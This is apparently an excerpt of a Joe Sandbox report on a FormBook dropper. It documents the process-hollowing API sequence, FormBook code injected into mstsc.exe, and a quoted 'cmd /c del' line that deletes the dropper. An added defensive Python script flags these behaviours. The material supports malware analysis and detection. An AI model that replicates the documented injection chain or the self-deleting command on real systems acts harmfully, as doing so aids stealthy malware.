                                                                                                                                                                                    execution_graph 10725 1b49b8 10726 1b49c4 10725->10726 10729 1b7768 10726->10729 10727 1b49d5 10730 1b7794 10729->10730 10733 1b86b0 10730->10733 10731 1b783e 10731->10727 10734 1b86c2 10733->10734 10737 1b86e2 10734->10737 10735 1b86d6 10735->10731 10738 1b870a 10737->10738 10739 1b872d 10738->10739 10741 1b87c0 10738->10741 10739->10735 10742 1b87e4 10741->10742 10745 1b4924 10742->10745 10746 1b8920 NtQueryInformationProcess 10745->10746 10748 1b886b 10746->10748 10748->10739 10749 74333d 10751 743180 10749->10751 10750 7431c9 10751->10750 10754 7440f1 10751->10754 10773 74415e 10751->10773 10755 74411a 10754->10755 10793 7445f4 10755->10793 10800 7446a9 10755->10800 10805 744c29 10755->10805 10812 74476d 10755->10812 10819 744c0c 10755->10819 10824 744827 10755->10824 10828 744d87 10755->10828 10841 7448b9 10755->10841 10845 7449bf 10755->10845 10850 7444fd 10755->10850 10854 744dfd 10755->10854 10865 744593 10755->10865 10868 744e76 10755->10868 10873 744636 10755->10873 10880 744795 10755->10880 10885 7447f5 10755->10885 10756 74413e 10756->10751 10774 7440ec 10773->10774 10775 744161 10773->10775 10777 7445f4 4 API calls 10774->10777 10778 7447f5 2 API calls 10774->10778 10779 744795 2 API calls 10774->10779 10780 744636 4 API calls 10774->10780 10781 744e76 2 API calls 10774->10781 10782 744593 CreateProcessA 10774->10782 10783 744dfd 6 API calls 10774->10783 10784 7444fd CreateProcessA 10774->10784 10785 7449bf 2 API calls 10774->10785 10786 7448b9 2 API calls 10774->10786 10787 744d87 6 API calls 10774->10787 10788 744827 ReadProcessMemory 10774->10788 10789 744c0c 2 API calls 10774->10789 10790 74476d 4 API calls 10774->10790 10791 744c29 4 API calls 10774->10791 10792 7446a9 2 API calls 10774->10792 10775->10751 10776 74413e 10776->10751 10777->10776 10778->10776 10779->10776 
10780->10776 10781->10776 10782->10776 10783->10776 10784->10776 10785->10776 10786->10776 10787->10776 10788->10776 10789->10776 10790->10776 10791->10776 10792->10776 10794 744600 10793->10794 10795 74496e 10794->10795 10891 742790 10794->10891 10895 742788 10794->10895 10899 7428b0 10794->10899 10903 7428b8 10794->10903 10795->10756 10801 7446b2 10800->10801 10803 7428b0 WriteProcessMemory 10801->10803 10804 7428b8 WriteProcessMemory 10801->10804 10802 744e9b 10803->10802 10804->10802 10806 74496e 10805->10806 10807 744600 10805->10807 10806->10756 10807->10806 10808 7428b0 WriteProcessMemory 10807->10808 10809 7428b8 WriteProcessMemory 10807->10809 10810 742790 VirtualAllocEx 10807->10810 10811 742788 VirtualAllocEx 10807->10811 10808->10807 10809->10807 10810->10807 10811->10807 10814 744600 10812->10814 10813 74496e 10813->10756 10814->10813 10815 742790 VirtualAllocEx 10814->10815 10816 742788 VirtualAllocEx 10814->10816 10817 7428b0 WriteProcessMemory 10814->10817 10818 7428b8 WriteProcessMemory 10814->10818 10815->10814 10816->10814 10817->10814 10818->10814 10820 744c0d 10819->10820 10907 742131 10820->10907 10912 742138 10820->10912 10821 744f44 10821->10756 10825 744a10 10824->10825 10916 742a18 10825->10916 10830 7449af 10828->10830 10840 742228 Wow64SetThreadContext 10828->10840 10920 742220 10828->10920 10829 744f12 10829->10756 10830->10829 10831 744600 10830->10831 10835 742220 Wow64SetThreadContext 10830->10835 10924 742228 10830->10924 10832 74496e 10831->10832 10833 7428b0 WriteProcessMemory 10831->10833 10834 7428b8 WriteProcessMemory 10831->10834 10837 742790 VirtualAllocEx 10831->10837 10838 742788 VirtualAllocEx 10831->10838 10832->10756 10833->10831 10834->10831 10835->10830 10837->10831 10838->10831 10840->10830 10843 7428b0 WriteProcessMemory 10841->10843 10844 7428b8 WriteProcessMemory 10841->10844 10842 7448e7 10843->10842 10844->10842 10846 7449d6 10845->10846 10848 742131 ResumeThread 10846->10848 10849 742138 ResumeThread 
10846->10849 10847 744f44 10847->10756 10848->10847 10849->10847 10851 74451f 10850->10851 10928 742c50 10851->10928 10856 7449af 10854->10856 10855 744f12 10855->10756 10856->10854 10856->10855 10857 744600 10856->10857 10859 742220 Wow64SetThreadContext 10856->10859 10860 742228 Wow64SetThreadContext 10856->10860 10858 74496e 10857->10858 10861 7428b0 WriteProcessMemory 10857->10861 10862 7428b8 WriteProcessMemory 10857->10862 10863 742790 VirtualAllocEx 10857->10863 10864 742788 VirtualAllocEx 10857->10864 10858->10756 10859->10856 10860->10856 10861->10857 10862->10857 10863->10857 10864->10857 10866 7445d5 10865->10866 10867 742c50 CreateProcessA 10865->10867 10866->10756 10867->10866 10869 744e77 10868->10869 10871 7428b0 WriteProcessMemory 10869->10871 10872 7428b8 WriteProcessMemory 10869->10872 10870 744e9b 10871->10870 10872->10870 10874 744600 10873->10874 10875 74496e 10874->10875 10876 7428b0 WriteProcessMemory 10874->10876 10877 7428b8 WriteProcessMemory 10874->10877 10878 742790 VirtualAllocEx 10874->10878 10879 742788 VirtualAllocEx 10874->10879 10875->10756 10876->10874 10877->10874 10878->10874 10879->10874 10881 7447a3 10880->10881 10883 742131 ResumeThread 10881->10883 10884 742138 ResumeThread 10881->10884 10882 744f44 10882->10756 10883->10882 10884->10882 10886 7449d6 10885->10886 10887 744ba6 10886->10887 10889 742131 ResumeThread 10886->10889 10890 742138 ResumeThread 10886->10890 10887->10756 10888 744f44 10888->10756 10889->10888 10890->10888 10892 7427d4 VirtualAllocEx 10891->10892 10894 742852 10892->10894 10894->10794 10896 7427d4 VirtualAllocEx 10895->10896 10898 742852 10896->10898 10898->10794 10900 742904 WriteProcessMemory 10899->10900 10902 7429a3 10900->10902 10902->10794 10904 742904 WriteProcessMemory 10903->10904 10906 7429a3 10904->10906 10906->10794 10908 7420c5 10907->10908 10909 742136 ResumeThread 10907->10909 10908->10821 10911 7421ce 10909->10911 10911->10821 10913 74217c ResumeThread 10912->10913 10915 7421ce 
10913->10915 10915->10821 10917 742a64 ReadProcessMemory 10916->10917 10919 742ae2 10917->10919 10919->10756 10921 742271 Wow64SetThreadContext 10920->10921 10923 7422ef 10921->10923 10923->10830 10925 742271 Wow64SetThreadContext 10924->10925 10927 7422ef 10925->10927 10927->10830 10929 742cd7 CreateProcessA 10928->10929 10931 742f35 10929->10931 10932 1b93b0 10934 1b93d4 10932->10934 10937 1b9882 10934->10937 10942 1b8fac 10934->10942 10946 1b8fb8 10934->10946 10938 1b984f 10937->10938 10939 1b9886 OutputDebugStringW 10937->10939 10938->10934 10941 1b993a 10939->10941 10941->10934 10943 1b9888 OutputDebugStringW 10942->10943 10945 1b993a 10943->10945 10945->10934 10947 1b9980 CloseHandle 10946->10947 10949 1b9a16 10947->10949 10949->10934
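The execution graph above records the API calls behind the hollowing step (CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread, with ReadProcessMemory and NtQueryInformationProcess alongside), and the process list records what it produced: the dropped ihbgfbin.exe, FormBook code in the memory of a SysWOW64 mstsc.exe, a cmd.exe that deletes the dropper, and EQNEDT32.EXE started with -Embedding. As an added example that is not part of this report or of Joe Sandbox, the Python below parses process entries in the report's Key:Value format and a fragment of the execution_graph text, flags those behaviours, and checks whether the full hollowing API chain is present. SAMPLE_RECORDS and SAMPLE_GRAPH are constructed, trimmed copies of the entries above; the finding labels and the alternative API names accepted per chain step (SetThreadContext, NtSetContextThread, NtResumeThread for non-Wow64 targets) are this example's own generalisation, not something the report shows.

```python
"""Triage helpers for a Joe Sandbox process list and execution_graph dump.

Added example, not Joe Sandbox code. SAMPLE_RECORDS is a trimmed, hand-made
copy of the report's process entries and SAMPLE_GRAPH a short excerpt of the
execution_graph text; the finding labels are this example's own.
"""
import re

# Constructed from the report's process entries, reduced to the fields used here.
SAMPLE_RECORDS = r"""
Target ID:7
Path:C:\Users\user\AppData\Roaming\ihbgfbin.exe
Commandline:"C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security

Target ID:9
Path:C:\Windows\explorer.exe
Commandline:C:\Windows\Explorer.EXE

Target ID:10
Path:C:\Windows\SysWOW64\mstsc.exe
Commandline:"C:\Windows\SysWOW64\mstsc.exe"
Yara matches:
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

Target ID:11
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:/c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"

Target ID:13
Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
"""

# Excerpt of the execution_graph nodes that carry an API name (node id, address, API, edge).
SAMPLE_GRAPH = ("10746 1b8920 NtQueryInformationProcess 10745->10746 "
                "10782 744593 CreateProcessA 10774->10782 "
                "10788 744827 ReadProcessMemory 10774->10788 "
                "10892 7427d4 VirtualAllocEx 10891->10892 "
                "10900 742904 WriteProcessMemory 10899->10900 "
                "10921 742271 Wow64SetThreadContext 10920->10921 "
                "10909 742136 ResumeThread 10907->10909")


def parse_records(text):
    """Split the 'Key:Value' process list into one dict per Target ID."""
    records, cur = [], None
    for line in text.splitlines():
        if line.startswith("Target ID:"):
            cur = {"id": int(line.split(":", 1)[1]), "yara": []}
            records.append(cur)
        elif cur is None or not line.strip():
            continue
        elif line.startswith("• Rule:"):          # keep only the rule name
            cur["yara"].append(line.split(",")[0].split(":", 1)[1].strip())
        elif ":" in line:
            key, value = line.split(":", 1)
            cur[key.strip().lower()] = value.strip()
    return records


def triage(records):
    """Return (target_id, finding) pairs for the behaviours seen in this report."""
    findings = []
    # A binary under AppData whose memory matches FormBook rules is the dropped payload.
    payloads = {r["path"].lower() for r in records
                if r["yara"] and "\\appdata\\" in r["path"].lower()}
    for r in records:
        path, cmd = r["path"].lower(), r.get("commandline", "").lower()
        if path in payloads:
            findings.append((r["id"], "dropped payload under AppData with FormBook Yara hits"))
        elif r["yara"] and path.startswith("c:\\windows\\"):
            findings.append((r["id"], "FormBook code in memory of a Windows binary: injection target"))
        deleted = re.search(r'/c del "([^"]+)"', cmd)
        if deleted and deleted.group(1) in payloads:
            findings.append((r["id"], "dropper self-deletion via cmd.exe"))
        if path.endswith("eqnedt32.exe") and "-embedding" in cmd:
            findings.append((r["id"], "Equation Editor started via OLE (-Embedding)"))
    return findings


# node id, hex address, then an API name; edges ("a->b") and "N API calls" summaries do not match.
NODE_RE = re.compile(r"\b(\d+) ([0-9a-f]{5,8}) ([A-Z][A-Za-z0-9]+)\b")


def api_calls(graph_text):
    """API names attached to execution_graph nodes, in node-id order (not call order)."""
    nodes = sorted((int(n), api) for n, _, api in NODE_RE.findall(graph_text))
    return [api for _, api in nodes]


# One set of acceptable API names per hollowing step; the non-Wow64 names are an assumption
# added for 64-bit targets, which this report does not contain.
HOLLOWING = (
    {"CreateProcessA", "CreateProcessW"},
    {"VirtualAllocEx"},
    {"WriteProcessMemory"},
    {"Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread"},
)


def hollowing_chain(apis):
    """True when every step of the create/alloc/write/set-context/resume chain is present."""
    seen = set(apis)
    return all(seen & step for step in HOLLOWING)


if __name__ == "__main__":
    for target_id, finding in triage(parse_records(SAMPLE_RECORDS)):
        print(f"Target {target_id}: {finding}")
    print("process hollowing chain:", hollowing_chain(api_calls(SAMPLE_GRAPH)))
```

The chain check is set-based on purpose: node ids in the execution_graph dump are not call order, so an ordered match would be fragile, and the graph edges (for example 10774->10782 for CreateProcessA) are the right place to recover sequencing if it is needed.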

Control-flow Graph

[Control-flow graph data omitted: function covering 1b0514-1b3dfd, basic blocks 0-558; the graph shows only calls to internal subroutines (1b01bc, 1b07dc-1b081c, 1b0d40-1b0ed0) and no imported API calls.]
Strings
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID: Ppp$$p$$p$$p
• API String ID: 0-2834240603
• Opcode ID: 475b6339fab3fdd310cfe190f30e14a563d673850dfe8c254207a170045ea110
• Instruction ID: 12080ea2f6d1c0a1e87dc5a6e5a8e341df80339c47d0c68797bf08fdd4c1b2bc
• Opcode Fuzzy Hash: 475b6339fab3fdd310cfe190f30e14a563d673850dfe8c254207a170045ea110
• Instruction Fuzzy Hash: 78531574A106198FDB25DF64C884BEAB7B2FF89300F5146E9E5096B361DB70AE81CF44

Control-flow Graph
[Control-flow graph data omitted: function covering 1b1141-1b3dfd, basic blocks 581-1137; the graph shows only calls to internal subroutines (1b01bc, 1b07dc-1b081c, 1b0d40-1b0ed0) and no imported API calls.]
Strings
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID: Ppp$$p$$p$$p
• API String ID: 0-2834240603
• Opcode ID: e1e1007611790eab299e1b3a1883293c3e8f3f9919bfea9d2ae590e7e1462784
• Instruction ID: ebbbb78b445f87577457c06ed214f2c1f8a8a3ba421e977c880f8a8e95e15370
• Opcode Fuzzy Hash: e1e1007611790eab299e1b3a1883293c3e8f3f9919bfea9d2ae590e7e1462784
• Instruction Fuzzy Hash: 4E431574A106198FDB25DB64C884BEAB7B2FF89300F1146E9E50D6B361DB70AE85CF44

Control-flow Graph
[Control-flow graph data omitted: function covering 1b4924-1b8a2a, basic blocks 1278-1282; the graph contains one imported API call, NtQueryInformationProcess.]
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 001B89D5
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0
• Opcode ID: 4e59758fde59db1e557f4e746343c41e6da340da27a3ee8853292780d80bfdf2
• Instruction ID: 007c9d46875f72601443d3945894c3c178fa688c807d40f10e31b15442ebb44c
• Opcode Fuzzy Hash: 4e59758fde59db1e557f4e746343c41e6da340da27a3ee8853292780d80bfdf2
• Instruction Fuzzy Hash: F04176B9D042589FCF10CFA9D984AEEFBB5BB49314F20902AE814B7310D735A945CF69

Control-flow Graph
[Control-flow graph data omitted: function covering 1b891e-1b8a2a, basic blocks 1294-1297; the graph contains one imported API call, NtQueryInformationProcess.]
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 001B89D5
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0
• Opcode ID: 7ea9eb4524fb14b946e25aba7ab734268a6d956a7b7094f0d60d87ef1cfcb01d
• Instruction ID: 2a59fcd60b8e351551f19020046d68719fbf5c8640ddd919f382c7543f80dfb4
• Opcode Fuzzy Hash: 7ea9eb4524fb14b946e25aba7ab734268a6d956a7b7094f0d60d87ef1cfcb01d
• Instruction Fuzzy Hash: F94186B9D002589FCF10CFA9D980AEEFBB1BB49314F20902AE814B7310D335A905CF65
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8069398e6663a439c17c677d209ba8a19011a60ad691f553b89ee414a4c5b48e
• Instruction ID: a003cb4d36d1fec4edd45b1a331b26c12e31b3bd19bb7c7079f1c9ccb37a0e00
• Opcode Fuzzy Hash: 8069398e6663a439c17c677d209ba8a19011a60ad691f553b89ee414a4c5b48e
• Instruction Fuzzy Hash: 36426074E01229CFDB54CFA9C984BADBBF2BF88310F1581A9D819A7355D734AA81CF50
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f22ccf51969a5c35c6074887966854526b015ce23b41174fdb57b2fee0a6104a
• Instruction ID: b16500dfe3c0e5a925d7336dbd0fb4fab2a233335d86e3f2f641e7e118d44879
• Opcode Fuzzy Hash: f22ccf51969a5c35c6074887966854526b015ce23b41174fdb57b2fee0a6104a
• Instruction Fuzzy Hash: BA32D074901268CFDB54DFA8C584A8EFBB2BF88351F55C59AD448AB212CB30DD85CFA1
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c56c7e9c9a1ee5af81c31a52f74da790b2ee1b96dd8b998e8cdf076fba71dc28
• Instruction ID: 0c9b3bfd8937878d24e9ea8747a51094cc817a9e6e419e966639291d08b892de
• Opcode Fuzzy Hash: c56c7e9c9a1ee5af81c31a52f74da790b2ee1b96dd8b998e8cdf076fba71dc28
• Instruction Fuzzy Hash: B2519E75D006189FDB08CFEAC8446EEFBB2FF88301F14802AE819AB254DB745A46CF41
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1356828b210379eaac96d65793fd842714f20fb34ca424eded89dbbbb75befa
• Instruction ID: 4c574e33f28ac95a3bcf4f4a7d1040b6a1e4f1d2d2cfe04d90859e5d04ca765e
• Opcode Fuzzy Hash: c1356828b210379eaac96d65793fd842714f20fb34ca424eded89dbbbb75befa
• Instruction Fuzzy Hash: CE41C275E006189FDB08CFEAD8956EEFBF2AF89300F14C06AD418AB264DB745A45CF41

Control-flow Graph
[Control-flow graph data omitted: function covering 742c50-74309f, basic blocks 1183-1246; the graph contains one imported API call, CreateProcessA.]
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00742F17
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                                                    • Opcode ID: 3b008aadf58f474e611a5eebbb9849327fa68d089a7665991af1e90775163e59
                                                                                                                                                                                    • Instruction ID: a9893d29b643b5129d167c0d22417e580321d6b877650b592a9e602b5c3d718d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b008aadf58f474e611a5eebbb9849327fa68d089a7665991af1e90775163e59
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EC12770D002198FDF24CFA8C845BEEBBB1BF09300F0091AAE419B7251DB749A95CF95

Control-flow Graph: code starting at 7428b0, calling WriteProcessMemory (graph rendering not preserved in text)

APIs
• WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0074298B
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 507be52c3e0646094abfd334a01e7a41ae65d7f3b96e5c358a22d822624633ce
• Instruction ID: 03b1c6ee88514da9567d2577fb9e294e23608487d85a35b50f0262cbfeb5a044
• Opcode Fuzzy Hash: 507be52c3e0646094abfd334a01e7a41ae65d7f3b96e5c358a22d822624633ce
• Instruction Fuzzy Hash: 6E419CB4D012589FCF10CFA9D984AEEFBB1BF49314F24902AE815B7250D378AA55CF64

Control-flow Graph: code starting at 7428b8, calling WriteProcessMemory (graph rendering not preserved in text)

APIs
• WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0074298B
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 2982dc5950edf98ef8cc190ffa38f8ff2dfd1f41959e4b7ee48c0dd864f54f76
• Instruction ID: 2884bc5bc21eee442fb4273d7e308007c59341c844d391d1ab9654a864821d08
• Opcode Fuzzy Hash: 2982dc5950edf98ef8cc190ffa38f8ff2dfd1f41959e4b7ee48c0dd864f54f76
• Instruction Fuzzy Hash: B541ACB4D002489FCF00CFA9D984AEEFBF1BB49314F24902AE814B7250D338AA55CF64

Control-flow Graph: code starting at 742a18, calling ReadProcessMemory (graph rendering not preserved in text)

APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00742ACA
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: ad72172b876e34dddc4ec8f0e9b23709d811d1c394d2ed8db948d1d819ec7162
• Instruction ID: 1717380579ea597ec89067283002f32b31adee4ae36ea3628dc2c311f6f7ecf1
• Opcode Fuzzy Hash: ad72172b876e34dddc4ec8f0e9b23709d811d1c394d2ed8db948d1d819ec7162
• Instruction Fuzzy Hash: 0341BAB4D002589FCF10CFAAD884AEEFBB1BF49310F10942AE814B7200D734A956CF68

Control-flow Graph: code starting at 742788, calling VirtualAllocEx (graph rendering not preserved in text)

APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0074283A
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f9b2b54af87a41c97b00d20cc00be3d9ec6df4e37a5de07d1dcf9492f90792ab
• Instruction ID: 72cce1cbfa6a94593b6bdab06327643504867be50d07cba774e6fdd6c11c568f
• Opcode Fuzzy Hash: f9b2b54af87a41c97b00d20cc00be3d9ec6df4e37a5de07d1dcf9492f90792ab
• Instruction Fuzzy Hash: 3D41AAB5D002589FCF10CFA9D984AEEFBB1AF49310F20942AE815B7310D735A956CF55

Control-flow Graph: code starting at 742790, calling VirtualAllocEx (graph rendering not preserved in text)

APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0074283A
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 9a7cc42fa2d9605e61a3a071601e1de8a9c2b76aad7141b970c0341821595078
• Instruction ID: 67e55cf0cb1b931165be39cdf8a75536c274163f18bc5031b9b6ef86f0283612
• Opcode Fuzzy Hash: 9a7cc42fa2d9605e61a3a071601e1de8a9c2b76aad7141b970c0341821595078
• Instruction Fuzzy Hash: 7941AAB4D002489FCF10CFA9D980AAEFBB5AF49310F10942AE815B7300D735A956CF55

Control-flow Graph: code starting at 742220, calling Wow64SetThreadContext (graph rendering not preserved in text)

APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 007422D7
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 94875472fe7509cee1d127a7d9b752b764d51a929a122dfac470ddf95cbe685e
• Instruction ID: 50c1bcf76b2fd2ded0433f8aca92111affcbbcca123fa34b3a4e917ac03d9572
• Opcode Fuzzy Hash: 94875472fe7509cee1d127a7d9b752b764d51a929a122dfac470ddf95cbe685e
• Instruction Fuzzy Hash: B541CEB4D002589FCF10CFA9D884AEEFBB1BF49314F24802AE415B7244C7789945CF54

Control-flow Graph: basic blocks in the range 1b984f-1b996f, calling OutputDebugStringW and a subroutine at 1b8fd4 (graph rendering not preserved in text)

APIs
• OutputDebugStringW.KERNEL32(?), ref: 001B9922
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID: DebugOutputString
• String ID:
• API String ID: 1166629820-0
• Opcode ID: 7c29428cba1c27d4514927fab4963a958d9a7e6f4d6773cc8433dd49b6f97a7d
• Instruction ID: 431fe2eff8fde892a87aa41030b05364cae23aff2a05b23ee765ef9a9270b07f
• Opcode Fuzzy Hash: 7c29428cba1c27d4514927fab4963a958d9a7e6f4d6773cc8433dd49b6f97a7d
• Instruction Fuzzy Hash: 3D41CAB4D002489FCB14CFA9D884AEEFBF1AF49314F24806AE818B7320D734A946CF54

                                                                                                                                                                                     Control-flow Graph (basic blocks and edges; graph image not reproduced)
                                                                                                                                                                                     • 742228-742288 → 74229f-7422ed (calls Wow64SetThreadContext), 742228-742288 → 74228a-74229c → 74229f-7422ed
                                                                                                                                                                                     • 74229f-7422ed → 7422f6-742342, 74229f-7422ed → 7422ef-7422f5 → 7422f6-742342
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007422D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                                                    • Opcode ID: 2ae601f6addee092af236e7839a5edb52b16dcabd1a142669bc36ed0ed9ddcbf
                                                                                                                                                                                    • Instruction ID: e8d3e8aed365212e1c6cca3340b1007e0359d1f9358d0f05f9794b35718d09f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae601f6addee092af236e7839a5edb52b16dcabd1a142669bc36ed0ed9ddcbf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D41ACB5D002589FCF10CFA9D884AEEFBB1BF49314F24842AE415B7244D778A945CF54

                                                                                                                                                                                     Control-flow Graph (basic blocks and edges; graph image not reproduced)
                                                                                                                                                                                     • 1b8fac-1b98e1 → 1b98f5-1b9938 (calls OutputDebugStringW), 1b8fac-1b98e1 → 1b98e3-1b98f2 → 1b98f5-1b9938
                                                                                                                                                                                     • 1b98f5-1b9938 → 1b9941-1b996f, 1b98f5-1b9938 → 1b993a-1b9940 → 1b9941-1b996f
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 001B9922
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugOutputString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1166629820-0
                                                                                                                                                                                    • Opcode ID: 70d965485b310f39ff5e75347d9358e1186ed9688dc50660f69cb95f35234d21
                                                                                                                                                                                    • Instruction ID: ebd0c9817c2512574f6771eebdf4d20fc828e108ddf17455fd5eb4c997a6cb05
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70d965485b310f39ff5e75347d9358e1186ed9688dc50660f69cb95f35234d21
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2319DB4D002099FCF14CF99D584AEEFBF1AB49314F14906AE918B7310D334A945CFA4
                                                                                                                                                                                    APIs
